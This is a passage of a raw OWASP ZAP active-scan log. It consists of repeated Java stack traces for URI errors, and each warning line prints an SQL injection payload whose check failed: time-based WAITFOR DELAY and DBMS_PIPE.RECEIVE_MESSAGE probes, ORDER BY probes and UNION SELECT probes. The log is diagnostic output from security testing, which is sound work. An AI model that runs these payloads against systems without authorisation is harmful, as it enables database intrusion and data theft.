Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685472 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND 'aeTi'='aeTi] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685473 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93) AND '%'='] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685474 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- Omwz] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685475 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) AND 8631=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(114)||CHR(118)||CHR(84),5) AND (4394=4394] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685477 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 1782=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(102)||CHR(97)||CHR(66),5)] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685478 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP') AND 8447=DBMS_PIPE.RECEIVE_MESSAGE(CHR(71)||CHR(72)||CHR(121)||CHR(102),5) AND ('JYjT'='JYjT] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685479 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP' AND 9141=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(98)||CHR(65)||CHR(114),5) AND 'fegI'='fegI] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685481 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP%' AND 5128=DBMS_PIPE.RECEIVE_MESSAGE(CHR(87)||CHR(101)||CHR(102)||CHR(74),5) AND '%'='] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685482 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP AND 8534=DBMS_PIPE.RECEIVE_MESSAGE(CHR(79)||CHR(100)||CHR(77)||CHR(113),5)-- hwXg] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685484 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685485 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) ORDER BY 7271-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685487 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685489 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685491 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685492 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 9685493 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ZAP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) at org.apache.commons.httpclient.HttpMethodBase.getURI(Unknown Source) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at 